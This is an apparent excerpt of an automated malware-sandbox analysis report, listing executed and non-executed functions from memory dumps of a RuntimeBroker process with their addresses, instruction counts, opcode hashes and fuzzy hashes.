Opcode ID: 9370ec102a4ecb5ae75459e6d2be78082d0a34186fcad34cc2df3cfdec3b9f69
Instruction ID: e25ab4d73484d49ec17a127756a138b80d5a81737bf16173128f5da59d6c14c7
Opcode Fuzzy Hash: 9370ec102a4ecb5ae75459e6d2be78082d0a34186fcad34cc2df3cfdec3b9f69
Instruction Fuzzy Hash: 8B118E70A0A68E4FEB59EB6488AA6B97BF0FF19300F0505BFD41DC61B2DE3565848741

Function 00007FFD9B8C4069 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 660b0ec9fda5fb98c8abb689eec567ef2abcbad605b7b093af2111c5505870fe
Instruction ID: baa3bac9f0806e45e7978809935331c19cba2947b3476bb246062ac5ac558726
Opcode Fuzzy Hash: 660b0ec9fda5fb98c8abb689eec567ef2abcbad605b7b093af2111c5505870fe
Instruction Fuzzy Hash: 7121C37090A64E8FEBD9EF6484652B97BE0FF29300F1501BFD419C71A2CA356584C741

Function 00007FFD9B8C68CD Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7893de2694104428e5940793b73e6ed5559c9c8c173ae6d97b8065dc5075c4bc
Instruction ID: df50935141d670b0d40cc9c3a9069cfc639747b72ad979ad5ffa1e9db8bb926a
Opcode Fuzzy Hash: 7893de2694104428e5940793b73e6ed5559c9c8c173ae6d97b8065dc5075c4bc
Instruction Fuzzy Hash: 1811C4B0A0A54E4FEB58EF6484656B97BA0FF68300F1101BFD41DC31A2DE35A6458741

Function 00007FFD9B8C474D Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f82fcea526e4cad47da81a29830b383b50eeb72873196e1f48678ee646164f7
Instruction ID: 63f019eff4d8b69175503bc93c4bbf9ba29594d0eae4ecd77a6449368c727937
Opcode Fuzzy Hash: 8f82fcea526e4cad47da81a29830b383b50eeb72873196e1f48678ee646164f7
Instruction Fuzzy Hash: 77119DB0A0A64E8FEB59EF6488696B97BE0FF29300F1505BFD419C75A6DE34A5808701

Function 00007FFD9B8B34C1 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53eef59d958b00abde51457aace4a2fc135c817672e83ca4420cb2528d55f240
Instruction ID: 28ce3cfd365e14d8d7ef073bce3d523cb686cd2b5cd20c9f60859840096522f2
Opcode Fuzzy Hash: 53eef59d958b00abde51457aace4a2fc135c817672e83ca4420cb2528d55f240
Instruction Fuzzy Hash: 83113070A0965E8FDB55EF74C8699BD7BE0FF18300F0105BED419D61A2DA35A5408B40

Function 00007FFD9B8BC240 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dedcda4325b87338b92cc9244da598f22252f8bfc5071c96e094ca603fe73fec
Instruction ID: 50838e3ed1caf7a7e29e458c49c6a4351af2ee25d6ed75868f84bf975fc3fc17
Opcode Fuzzy Hash: dedcda4325b87338b92cc9244da598f22252f8bfc5071c96e094ca603fe73fec
Instruction Fuzzy Hash: 1F11823090965E4FDB56EBB8886D5F97BF0FF19304F0204BBD419C70A2DA346654CB50

Function 00007FFD9B8C2221 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45850523419e3685309aa6cd8a3784b18b32ffbfb5be95281351a8fccaff0efb
Instruction ID: b7f1cdb3e4e2a7c333f4e68e4e51e18bf25c49c5cf1645386748f8bccaf368f8
Opcode Fuzzy Hash: 45850523419e3685309aa6cd8a3784b18b32ffbfb5be95281351a8fccaff0efb
Instruction Fuzzy Hash: 5A118E71A0D55F8EE792FFB4885C5F9BBE4FF1A301F0104B6D418C60A6DA3492448B41

Function 00007FFD9B8B11AD Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42f63b2998cbc12c68409ebb1b4392cfa1e7e31a4f73809c2d23eff8e46dec3d
Instruction ID: 62d7749ba962ba2d1db5f0469346717c1c5b0682d207fe80f9fef91c555b10b7
Opcode Fuzzy Hash: 42f63b2998cbc12c68409ebb1b4392cfa1e7e31a4f73809c2d23eff8e46dec3d
Instruction Fuzzy Hash: 0711B231E1A65E4EEB69EBB4C4696B97BE0EF5A300F0115BED01ACA1E1DA255640CB40

Function 00007FFD9B8C5A39 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d7a8e78787d4835e4021be0f1d81bae073419de9254907c2f5d2adf44654b25
Instruction ID: 244e3af690e3a5d853859038023626338c40d76fb8ce7d12a73118a1201be294
Opcode Fuzzy Hash: 0d7a8e78787d4835e4021be0f1d81bae073419de9254907c2f5d2adf44654b25
Instruction Fuzzy Hash: DA114270A0A68E4FEB51ABA488AA5F97BE0FF19300F0545B7D41CC70A6DA34A5448751

Function 00007FFD9B8B21E5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baa3c33542e3a08bd9639d895fe851f845026beb155b44facde372fa01d20e04
Instruction ID: cf93074fe3797a1cf3553d4b4c5d42208b420c4fee83979a43ecde6c1cf7ef92
Opcode Fuzzy Hash: baa3c33542e3a08bd9639d895fe851f845026beb155b44facde372fa01d20e04
Instruction Fuzzy Hash: B3019630A4E55E5FE761EFB494555A97BE0EF09300F0245B6D418C70B6DE35E580CB41

Function 00007FFD9B8C490D Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9cb257e792f2a7c8b142d70a920e98d0783a963302d7e879d35a25924b4e7ec
Instruction ID: 39f6c6b61a8f7d3e2fb9fb8301bc658fa39b59f4bd1307bed859caf56b4eb945
Opcode Fuzzy Hash: f9cb257e792f2a7c8b142d70a920e98d0783a963302d7e879d35a25924b4e7ec
Instruction Fuzzy Hash: 0B110170A0954E4FEB58EB6488A96BD7BE0FF18304F0505BFD42DC20B2DE356284CB01

Function 00007FFD9B8B2E51 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad9c73515249b2df9b153ac638b9d2fa177dc9f4f44415134793b1c3ca4fab7
Instruction ID: 1656a9e72efe5afd44f688f1ff992e23245ce21976ba183f1d494607457198ae
Opcode Fuzzy Hash: fad9c73515249b2df9b153ac638b9d2fa177dc9f4f44415134793b1c3ca4fab7
Instruction Fuzzy Hash: 65017530A1E65E8FE761AFB584995A97BE0FF19300F0245B6D408C61A7EA34E5448B41

Function 00007FFD9B8BCF1D Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93d8397553c74d492ac5ce6fbd55e267a45aaa03529fe57834921d3ae964b421
Instruction ID: 7437b1c401066cdca49caa052b8bf4ef1f2846cb8effd4b8087bb525aa0bb40f
Opcode Fuzzy Hash: 93d8397553c74d492ac5ce6fbd55e267a45aaa03529fe57834921d3ae964b421
Instruction Fuzzy Hash: 0311AD30A19A4E8FDB59EFB4C4682BA7BE0FF19304F0204BAD41DC22A1DB34A650CB40

Function 00007FFD9B8B05D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ec994b16fc7b5627116464db20256fc4040e138052a0d7163e40854716498a2
Instruction ID: 391ced35a8c5505115edc7aaa6acfb9b763b4cbd6d49c5430b235393f0f417c3
Opcode Fuzzy Hash: 6ec994b16fc7b5627116464db20256fc4040e138052a0d7163e40854716498a2
Instruction Fuzzy Hash: D3019E30A1A51E8FEB98EF64C0A46BA77A1FF59304F61007ED40EC71A5CA36A650CB80

Function 00007FFD9B8BB56A Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bce28c4c3bba7e26a6b9020aa2cc6af4175233c2e096ba94b80ad718599ae14a
Instruction ID: 0eaa84b75f35c2537fb45efb86f1a01764226b33b61946fdade478ee239b59d0
Opcode Fuzzy Hash: bce28c4c3bba7e26a6b9020aa2cc6af4175233c2e096ba94b80ad718599ae14a
Instruction Fuzzy Hash: 44018030A0991E8EEB64EF78C4695BD77E0FF1C304F11047AD41DC21A1DE30A2408B41

Function 00007FFD9B8B282D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc0ae62b06ed56bfbac95990bc367bc2f481c98668def94bf6f7246cf480c7e7
Instruction ID: 069f90b638f8a25a0a5e7243ae2186db6d1ea9483d93b3fd5b08c5aa86e9f05f
Opcode Fuzzy Hash: fc0ae62b06ed56bfbac95990bc367bc2f481c98668def94bf6f7246cf480c7e7
Instruction Fuzzy Hash: AC018430E5A55E8FE761EFB494595E97BE0FF1D300F0245B6D418C70A6EE38E2408B80

Function 00007FFD9B8C762D Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76364e04cd3bea07a3eddd1c47bab04d3cb7897c075e31b5fc0ece336e8a4bc
Instruction ID: 0bf7557711a0cec780cc591412ba1ff5304c20d8652446e8a720b26b6d31a282
Opcode Fuzzy Hash: e76364e04cd3bea07a3eddd1c47bab04d3cb7897c075e31b5fc0ece336e8a4bc
Instruction Fuzzy Hash: 17019E70A4A64E8FDB59EF68C8699BD3BA1FF19304F4204BED01AC61E2DA35A650C741

Function 00007FFD9B8C6F99 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4818a1ab262817bb27cffb509c6bcee7ec73f0b9d949f29c8378738cebd88081
Instruction ID: 6f1a4e25c5cdcea78c04f927f798a0ede657c428ac80d7cc586a559344424a2f
Opcode Fuzzy Hash: 4818a1ab262817bb27cffb509c6bcee7ec73f0b9d949f29c8378738cebd88081
Instruction Fuzzy Hash: ED015EB0A5E68E4FE762BB7888695B93BE0EF19300F0645B7D418CB0A6DA28E5548701

Function 00007FFD9B8BA409 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f86ff32c5d02b007b1aba9761028047c326a07f73b81e2dccdeff2504067d7c
Instruction ID: 4b3f031682cf934cf123b2aa5a6f298adb6f915ce9f2fbe782ff2525792c08ac
Opcode Fuzzy Hash: 7f86ff32c5d02b007b1aba9761028047c326a07f73b81e2dccdeff2504067d7c
Instruction Fuzzy Hash: 16017130A4E69E5FE766AB74886D5A97BE0EF4A300F0604F7D408C70A6DE38A5448B41

Function 00007FFD9B8B2EC9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d002d4ebae83db68c213b77711ed86279527a2387f54e9699f9a76ea6b9e94c
Instruction ID: 0a771135f8b259967f7e62f77e69041566d7d3beb1d721044e357ce45ab51790
Opcode Fuzzy Hash: 0d002d4ebae83db68c213b77711ed86279527a2387f54e9699f9a76ea6b9e94c
Instruction Fuzzy Hash: DF018430A1E65E4FE762EFB494695A97BE0EF4A304F4648F6D408C70B6DA38A5448B41

Function 00007FFD9B8B0610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f06563224d787505c01bf0500be9c50dc72bd1d611ba02fc520e338da844697
Instruction ID: 670474a34aad5bf1b917eea9bc3275515c89d2dde8f99b22f5120781052fbf2c
Opcode Fuzzy Hash: 0f06563224d787505c01bf0500be9c50dc72bd1d611ba02fc520e338da844697
Instruction Fuzzy Hash: 9B018130A1951E8AEB68EFB4D4696BA7BE0FF1C305F11087ED41EC21E5DF35A690CA41

Function 00007FFD9B8B0608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c577c774c2e78e5efec23f0f9fa016f7a52e4fa6c2cde9a0255bbeb12bf8dd5d
Instruction ID: 4562ee97cf5498ec9eb811ab0033df5a7692204335a6bc7b50c73338ed729e7e
Opcode Fuzzy Hash: c577c774c2e78e5efec23f0f9fa016f7a52e4fa6c2cde9a0255bbeb12bf8dd5d
Instruction Fuzzy Hash: 2301AD30A1550ECAEB69EFB4C4686B936A0FF1C304F11087ED41EC21E5DE35A240CE44

Function 00007FFD9B8C543D Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 514dc4bf48fff595fea4dc9dbcad2af4618043acd56d900f4fa5c5a84923621e
Instruction ID: 163af4c522eed0bacf7a16b869a019b028ac090c6ff8e1590f53f7e61aaee500
Opcode Fuzzy Hash: 514dc4bf48fff595fea4dc9dbcad2af4618043acd56d900f4fa5c5a84923621e
Instruction Fuzzy Hash: D2F0A752B18D4E0BAB8CFB5C7CAA9F9A382DBA826175042F7D40DC719FED2899434340

Function 00007FFD9B8B1C2D Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a5a1fdb211dbce8aa3659d45a0f4026f686ed5af468e789878eba6db056a761
Instruction ID: 8712a6da862997d937bf67c534612075173d240703cc0c41fc869053ec9b1efe
Opcode Fuzzy Hash: 5a5a1fdb211dbce8aa3659d45a0f4026f686ed5af468e789878eba6db056a761
Instruction Fuzzy Hash: B101D630A1A64E8FDB54EF64C4B51B93BA1FF19300F51007ED408C71A1CB359550CB80

Function 00007FFD9B8B05D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78278305cf824aa07437c24bd85a7959266c1486a95a0b96405b917c84d895a0
Instruction ID: 8c0898c1370c2071aeeed0e722c15d2d54a5687e1b5435c1a778c802c0a2a413
Opcode Fuzzy Hash: 78278305cf824aa07437c24bd85a7959266c1486a95a0b96405b917c84d895a0
Instruction Fuzzy Hash: 27F0C230A1A51E8FEB58EF7494B56FA37A0FF09308F51007AE80DC70A1CA35A650CB80

Function 00007FFD9B8B11C0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 595ad5724abc3f4975832a31e5ea5e19ef665e4c27b76695f95a2a1a8751c0e5
Instruction ID: 7f8ee18b8299a71fdc9943c95df2826acfe5f112cd23c93f70992ad0ed03a47a
Opcode Fuzzy Hash: 595ad5724abc3f4975832a31e5ea5e19ef665e4c27b76695f95a2a1a8751c0e5
Instruction Fuzzy Hash: D4F0C831E2A56F4AEBA4EBF488692F976E0FF59304F00153ED42DC60E1EF2416548A80

Function 00007FFD9B8BB244 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37754cb634becf611da98f987fe9954ac928639f781fd69bfd451f8bc398a6d8
Instruction ID: c95ee5fdf911660456aaff4330ac87ee15ba4d261bf46e172c652028e1790afe
Opcode Fuzzy Hash: 37754cb634becf611da98f987fe9954ac928639f781fd69bfd451f8bc398a6d8
Instruction Fuzzy Hash: 3BF01D70A1A92D8EDBA5DB248455BE9B3B5FF5C300F5181B6C40DD3165DE34AB819F80

Function 00007FFD9B8B2749 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 449f0ecfa30cb93d85a91a10af14c671c055e5dd50f03d9afe9ec377252f4731
Instruction ID: bcbfcaafdc4561e942b00c38ad9c174b00f9fc45f6038092b1fc8b5d460b3731
Opcode Fuzzy Hash: 449f0ecfa30cb93d85a91a10af14c671c055e5dd50f03d9afe9ec377252f4731
Instruction Fuzzy Hash: 10F0963091A38E8FDB669FB498642E93B60FF0A305F4544BAD409C60E6DB386554CB51

Function 00007FFD9B8B27BD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9caab22e35eb82a2182f65127a8349281ea06b13dcf6dcb6dc34f16c4050abb6
Instruction ID: 8bd0fe50c6c7128c8fa127d84146e199f772735227e918be017e7eaeed9ee2e0
Opcode Fuzzy Hash: 9caab22e35eb82a2182f65127a8349281ea06b13dcf6dcb6dc34f16c4050abb6
Instruction Fuzzy Hash: 40F0F030A1E69E8FEB699FB488251B93FA0FF09304F0504BED409C20E6DB38A5548B81

Function 00007FFD9B8C4D9B Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0005425c93308fe6c320d6d92374186a8e7d9707bf35adc5d23c31126bf6560
Instruction ID: fdf481dfd6840fc69fe5f7cfb57d2be8eed9a1543d0d927f11dceeaa2f198730
Opcode Fuzzy Hash: b0005425c93308fe6c320d6d92374186a8e7d9707bf35adc5d23c31126bf6560
Instruction Fuzzy Hash: 93D0C972D1AA1DDEEBA0EB98849D2A8BBE2FF5D340B81012FD548D2161DF3015519B00

Non-executed Functions

Function 00007FFD9B8C196E Relevance: 5.2, Strings: 4, Instructions: 172COMMON

Download Yara Rule

Strings

D\, xrefs: 00007FFD9B8C1989
Z\, xrefs: 00007FFD9B8C1A1E
N\, xrefs: 00007FFD9B8C19CF
d\, xrefs: 00007FFD9B8C1A69

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: D\$N\$Z\$d\
API String ID: 0-237293203
Opcode ID: 1a812ffbb008ac226cd5e38846f8778b936bd1ecca92cb5ed9ef804cf124729d
Instruction ID: 5efba1defa4580e7367e6364397784f5fbbf2a403e87f19e88037786ab539bc9
Opcode Fuzzy Hash: 1a812ffbb008ac226cd5e38846f8778b936bd1ecca92cb5ed9ef804cf124729d
Instruction Fuzzy Hash: 9B51CA70A0991D8FDBA8EF58C8A5BA9B7B1FF98301F1041A9D01DE7295CE34A981CF40

Function 00007FFD9B8BE167 Relevance: 5.1, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

R, xrefs: 00007FFD9B8BE171
:, xrefs: 00007FFD9B8BE1F5
g, xrefs: 00007FFD9B8BE2CC
I, xrefs: 00007FFD9B8BE268

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: :$I$R$g
API String ID: 0-989302672
Opcode ID: 0e7b9fa0b0559f0af2e2da1097ce95105fbd24f9504eeff97f3483fe07b18d5a
Instruction ID: 4016df5e2f334c10719680a94baf199430806b36b4038c07ff249e69468d5ce1
Opcode Fuzzy Hash: 0e7b9fa0b0559f0af2e2da1097ce95105fbd24f9504eeff97f3483fe07b18d5a
Instruction Fuzzy Hash: CA51A070E1566D8FDBA9DF28C890BE9B7B1EB59301F5041E9D44DA2291CB746BC1CF80

Function 00007FFD9B8BDFAE Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

", xrefs: 00007FFD9B8BE029
K, xrefs: 00007FFD9B8BDFF3
1, xrefs: 00007FFD9B8BED34
$, xrefs: 00007FFD9B8BDFB8

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: "$$$1$K
API String ID: 0-1999501151
Opcode ID: d673ca7978931e7aeb60f2daeba03d4667ad1f0addf21c891c3ff5cfd57dbed2
Instruction ID: 150820aef9216a3ec7494655af0bde182e13a90334ea0365879b5f95f89d949d
Opcode Fuzzy Hash: d673ca7978931e7aeb60f2daeba03d4667ad1f0addf21c891c3ff5cfd57dbed2
Instruction Fuzzy Hash: 1A310EB0E0A26E8FEBB4DF54C8947E977B1EF58311F0045BAD44DA6691CB385A84CF41

Function 00007FFD9B8BE535 Relevance: 5.1, Strings: 4, Instructions: 84COMMON

Download Yara Rule

Strings

], xrefs: 00007FFD9B8BE56C
k, xrefs: 00007FFD9B8BE814
@, xrefs: 00007FFD9B8BE5A1
{, xrefs: 00007FFD9B8BEB57

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: @$]$k${
API String ID: 0-3627332583
Opcode ID: 50c1ba3bb7dffc024d7be2fb3d30afb2d6c5df78b6d158bfced86c3a6a90b60a
Instruction ID: f4155c70e474bc3d51735ee47fdc769354e1493973c6dcf15a4d4bd21f56dd9c
Opcode Fuzzy Hash: 50c1ba3bb7dffc024d7be2fb3d30afb2d6c5df78b6d158bfced86c3a6a90b60a
Instruction Fuzzy Hash: CD41D870E0923D8FDBB4DF64C8A47A9B6B1AB58301F1045F9D00DA66A1CB785BC4CF81

Analysis Process: ITlIQtTGhEyfMRHaLp.exePID: 3652, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9B8ADF01 Relevance: 6.4, Strings: 5, Instructions: 143COMMON

Download Yara Rule

Strings

;, xrefs: 00007FFD9B8AF325
